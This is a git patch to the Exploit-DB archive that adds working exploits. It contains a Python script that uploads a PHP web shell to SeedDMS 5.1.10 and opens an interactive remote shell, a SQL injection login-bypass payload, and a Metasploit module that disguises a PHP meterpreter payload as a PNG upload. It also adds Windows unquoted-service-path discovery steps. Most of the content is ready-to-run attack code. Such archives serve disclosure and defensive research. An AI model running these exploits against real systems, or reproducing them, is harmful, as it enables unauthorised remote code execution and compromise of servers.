From 4fbb1eb22a91612a2efd43efc6fa03f68fc400d0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 26 Jun 2021 05:01:55 +0000 Subject: [PATCH] DB: 2021-06-26 5 changes to exploits/shellcodes SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated) Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit) --- exploits/php/webapps/50062.py | 272 +++++++++++++++++++++++++++++++ exploits/php/webapps/50063.txt | 31 ++++ exploits/php/webapps/50064.rb | 142 ++++++++++++++++ exploits/windows/local/50047.txt | 1 + exploits/windows/local/50061.txt | 27 +++ files_exploits.csv | 4 + 6 files changed, 477 insertions(+) create mode 100755 exploits/php/webapps/50062.py create mode 100644 exploits/php/webapps/50063.txt create mode 100755 exploits/php/webapps/50064.rb create mode 100644 exploits/windows/local/50061.txt diff --git a/exploits/php/webapps/50062.py b/exploits/php/webapps/50062.py new file mode 100755 index 000000000..c100fed54 --- /dev/null +++ b/exploits/php/webapps/50062.py @@ -0,0 +1,272 @@ +# Exploit Title: Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) +# Date: 25/06/2021 +# Exploit Author: Bryan Leong +# Vendor Homepage: https://www.seeddms.org/index.php?id=2 +# Software Link: https://sourceforge.net/projects/seeddms/files/seeddms-5.0.11/ +# Version: Seeddms 5.1.10 +# Tested on: Windows 7 x64 +# CVE: CVE-2019-12744 + +import requests +import argparse +import sys +import random +import string +from bs4 import BeautifulSoup +from requests_toolbelt import MultipartEncoder + +def sysArgument(): + ap = argparse.ArgumentParser() + + ap.add_argument("-u", "--username", required=True, help="login username") + ap.add_argument("-p", "--password", required=True, help="login password") + ap.add_argument("--url", required=True, help="target URL Path") + + args = vars(ap.parse_args()) + + return args['username'], args['password'], args['url'] + +def login(sessionObj, username, password, url): + loginPath = "/op/op.Login.php" + url += loginPath + + postData = { + 'login': username, + 'pwd': password, + 'lang' : 'en_GB' + } + try: + rsl = sessionObj.post(url, data=postData) + + if(rsl.status_code == 200): + if "Error signing in. User ID or password incorrect." in rsl.text: + print("[!] Incorrect Credential.") + else: + print("[*] Login Successful.") + print("[*] Session Token: " + sessionObj.cookies.get_dict()['mydms_session']) + return sessionObj + + else: + print("[!] Something went wrong.") + print("Status Code: %d" % (rsl.status_code)) + sys.exit(0) + except Exception as e: + print("[!] Something Went Wrong!") + print(e) + sys.exit(0) + + return sessionObj + +def formTokenCapturing(sessionObj, url): + path = "/out/out.AddDocument.php?folderid=1&showtree=1" + url += path + formToken = "" + + try: + rsl = sessionObj.get(url) + + if(rsl.status_code == 200): + print("[*] Captured Form Token.") + + #extracting form token + soup = BeautifulSoup(rsl.text,'html.parser') + form1 = soup.findAll("form", {"id": "form1"}) + + soup = BeautifulSoup(str(form1[0]),'html.parser') + formToken = soup.find("input", {"name": "formtoken"}) + print("[*] Form Token: " + formToken.attrs['value']) + + return sessionObj, formToken.attrs['value'] + else: + print("[!] Something went wrong.") + print("Status Code: %d" % (rsl.status_code)) + sys.exit(0) + + except Exception as e: + print("[!] Something Went Wrong!") + print(e) + sys.exit(0) + + return sessionObj, formToken + +def uploadingPHP(sessionObj, url, formToken): + path = "/op/op.AddDocument.php" + url += path + + #generating random name + letters = string.ascii_lowercase + rand_name = ''.join(random.choice(letters) for i in range(20)) + + #POST Data + payload = { + 'formtoken' : formToken, + 'folderid' : '1', + 'showtree' : '1', + 'name' : rand_name, + 'comment' : '', + 'keywords' : '', + 'sequence' : '2', + 'presetexpdate' : 'never', + 'expdate' : '', + 'ownerid' : '1', + 'reqversion' : '1', + 'userfile[]' : ( + '%s.php' % (rand_name), + open('phpCmdInjection.php', 'rb'), + 'application/x-httpd-php' + ), + 'version_comment' : '' + } + + multiPartEncodedData = MultipartEncoder(payload) + + try: + rsl = sessionObj.post(url, data=multiPartEncodedData, headers={'Content-Type' : multiPartEncodedData.content_type}) + + if(rsl.status_code == 200): + print("[*] Command Injection PHP Code Uploaded.") + print("[*] Name in Document Content Shows: " + rand_name) + + return sessionObj, rand_name + else: + print("[!] Something went wrong.") + print("Status Code: %d" % (rsl.status_code)) + sys.exit(0) + + + except Exception as e: + print("[!] Something Went Wrong!") + print(e) + sys.exit(0) + + return sessionObj, rand_name + +def getDocID(sessionObj, url, docName): + path = "/out/out.ViewFolder.php?folderid=1" + url += path + + try: + rsl = sessionObj.get(url) + + if(rsl.status_code == 200): + #searching & extracting document id storing payload + soup = BeautifulSoup(rsl.text,'html.parser') + viewFolderTables = soup.findAll("table", {"id": "viewfolder-table"}) + + soup = BeautifulSoup(str(viewFolderTables[0]),'html.parser') + rowsDoc = soup.findAll("tr", {"class": "table-row-document"}) + + for i in range(len(rowsDoc)): + soup = BeautifulSoup(str(rowsDoc[i]),'html.parser') + tdExtracted = soup.findAll("td") + + foundDocName = tdExtracted[1].contents[0].contents[0] + + #when document name matched uploaded document name + if(foundDocName == docName): + print("[*] Found Payload Document Name. Extracting Document ID...") + tmp = tdExtracted[1].contents[0].attrs['href'].split('?') + docID = tmp[1].replace("&showtree=1", "").replace('documentid=', '') + + print("[*] Document ID: " + docID) + + return sessionObj, docID + + #after loops & still unable to find matched uploaded Document Name + print("[!] Unable to find document ID.") + sys.exit(0) + + else: + print("[!] Something went wrong.") + print("Status Code: %d" % (rsl.status_code)) + sys.exit(0) + + except Exception as e: + print("[!] Something Went Wrong!") + print(e) + sys.exit(0) + + return sessionObj + +def shell(sessionObj, url, docID): + #remove the directory /seeddms-5.1.x + splitUrl = url.split('/') + remLastDir = splitUrl[:-1] + + url = "" + #recontruct url + for text in remLastDir: + url += text + "/" + + #path storing uploaded php code + path = "/data/1048576/%s/1.php" % docID + url += path + + #checking does the uploaded php exists? + rsl = sessionObj.get(url) + + if(rsl.status_code == 200): + print("[*] PHP Script Exist!") + print("[*] Injecting some shell command.") + + #1st test injecting whoami command + data = { + 'cmd' : 'whoami' + } + + rsl = sessionObj.post(url, data=data) + + if(rsl.text != ""): + print("[*] There's response from the PHP script!") + print('[*] System Current User: ' + rsl.text.replace("
", "").replace("
", "")) + + print("[*] Spawning Shell. type .exit to exit the shell", end="\n\n") + #start shell iteration + while(True): + cmd = input("[Seeddms Shell]$ ") + + if(cmd == ".exit"): + print("[*] Exiting shell.") + sys.exit(0) + + data = { + 'cmd' : cmd + } + + rsl = sessionObj.post(url, data=data) + print(rsl.text.replace("
", "").replace("
", "")) + + else: + print("[!] No response from PHP script. Something went wrong.") + sys.exit(0) + + else: + print("[!] PHP Script Not Found!!") + print(rsl.status_code) + sys.exit(0) + + + + +def main(): + username, password, url = sysArgument() + + sessionObj = requests.Session() + + #getting session token from logging in + sessionObj = login(sessionObj, username, password, url) + + #capturing form token for adding document + sessionObj, formToken = formTokenCapturing(sessionObj, url) + + #uploading php code for system command injection + sessionObj, docName = uploadingPHP(sessionObj, url, formToken) + + #getting document id + sessionObj, docID = getDocID(sessionObj, url, docName) + + #spawning shell to exec system Command + shell(sessionObj, url, docID) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/50063.txt b/exploits/php/webapps/50063.txt new file mode 100644 index 000000000..4f2eeed1b --- /dev/null +++ b/exploits/php/webapps/50063.txt @@ -0,0 +1,31 @@ +# Exploit Title: Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated) +# Date: 24-06-2021 +# Exploit Author: Barış Yıldızoğlu +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip +# Version: 1.0 +# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 + +Request: + +POST /client%20details/index.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 +Firefox/78.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 50 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1 /client%20details/index.php +Cookie: PHPSESSID=86klv32pm6nvt60qtli6peonod +Upgrade-Insecure-Requests: 1 + +uemail={Payload Here}&password=&login=LOG+IN + + +# Proof of Concept: + Payload: admin' or 1=1# \ No newline at end of file diff --git a/exploits/php/webapps/50064.rb b/exploits/php/webapps/50064.rb new file mode 100755 index 000000000..140aec654 --- /dev/null +++ b/exploits/php/webapps/50064.rb @@ -0,0 +1,142 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Lightweight facebook-styled blog authenticated remote code execution", + 'Description' => %q{ + This module exploits the file upload vulnerability of Lightweight self-hosted facebook-styled PHP blog and allows remote code execution. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Maide Ilkay Aydogdu ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://prodaft.com'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'WfsDelay' => 5, + }, + 'Platform' => ['php'], + 'Arch' => [ ARCH_PHP], + 'Targets' => + [ + ['PHP payload', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 19 2018", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [true, 'Blog username', 'demo']), + OptString.new('PASSWORD', [true, 'Blog password', 'demo']), + OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/']) + ] + ) + end + + + + def login + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path), + ) + + + cookie = res.get_cookies + token = res.body.split('":"')[1].split('"')[0] + # token = res.to_s.scan(/"[abcdef0-9]{10}"}/)[0].to_s.tr('"}', '') + print_status("Got CSRF token: #{token}") + print_status('Logging into the blog...') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'ajax.php'), + 'headers' => { + 'Csrf-Token' => token, + }, + 'cookie' => cookie, + 'data' => "action=login&nick=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}", + ) + + if res && res.code == 200 + print_good("Successfully logged in with #{datastore['USERNAME']}") + json = res.get_json_document + if json.empty? && json['error'] + print_error('Login failed!') + return nil, nil + end + else + print_error("Login failed! Status code #{res.code}") + return nil, nil + end + + return cookie, token + end + + + def exploit + cookie, token = login + unless cookie || token + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed") + end + + data = Rex::MIME::Message.new # jWPU1tZmoAZgooopowaNGjRq0KhBowaNGjRqEHYAALgBALdg7lyPAAAAAElFTkSuQmCC + png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4') # only the PNG header + data.add_part(png+payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"mia.php\"") + print_status('Uploading shell...') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'ajax.php'), + 'cookie' => cookie, + 'vars_get' => { + 'action' => 'upload_image' + }, + 'headers' => { + 'Csrf-Token' => token, + }, + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s, + ) + + # print_status(res.to_s) + if res && res.code == 200 + json = res.get_json_document + if json.empty? || !json['path'] + fail_with(Failure::UnexpectedReply, 'Unexpected json response') + end + + print_good("Shell uploaded as #{json['path']}") + else + print_error("Server responded with code #{res.code}") + print_error("Failed to upload shell") + return false + end + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, json['path'])}, 3 + ) + print_good("Payload successfully triggered !") + end +end \ No newline at end of file diff --git a/exploits/windows/local/50047.txt b/exploits/windows/local/50047.txt index da0e9af57..52a27d85d 100644 --- a/exploits/windows/local/50047.txt +++ b/exploits/windows/local/50047.txt @@ -4,6 +4,7 @@ # Version: Remote Mouse 3.008 # Tested on: Windows 10 Pro Version 21H1 # Reference: https://deathflash.ml/blog/remote-mouse-lpe +# CVE: CVE-2021-35448 Steps to reproduce: diff --git a/exploits/windows/local/50061.txt b/exploits/windows/local/50061.txt new file mode 100644 index 000000000..5b23e983b --- /dev/null +++ b/exploits/windows/local/50061.txt @@ -0,0 +1,27 @@ +# Exploit Title: SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 21-06-2021 +# Vendor Homepage: https://brother.com/ +# Tested Version: 7.60 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ + +SAPSprint SAPSprint C:\Program Files\SAP\SAPSprint\sapsprint.exe Auto + +C:\>sc qc SAPSprint +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SAPSprint + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME: C:\Program Files\SAP\SAPSprint\sapsprint.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : SAPSprint + DEPENDENCIES : Spooler + SERVICE_START_NAME: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 573fefb55..d7f8dfaf1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11352,6 +11352,7 @@ id,file,description,date,author,type,platform,port 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows, 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows, 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows, +50061,exploits/windows/local/50061.txt,"SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path",2021-06-25,"Brian Rodriguez",local,windows, 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows, 49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows, 49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios, @@ -44135,6 +44136,7 @@ id,file,description,date,author,type,platform,port 49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",2021-06-03,flast101,webapps,php, 49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php, 49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",2021-06-03,sirpedrotavares,webapps,hardware, +50062,exploits/php/webapps/50062.py,"Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)",2021-06-25,"Bryan Leong",webapps,php, 49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php, 49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php, 49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby, @@ -44201,3 +44203,5 @@ id,file,description,date,author,type,platform,port 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm, 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware, 50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware, +50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php, +50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,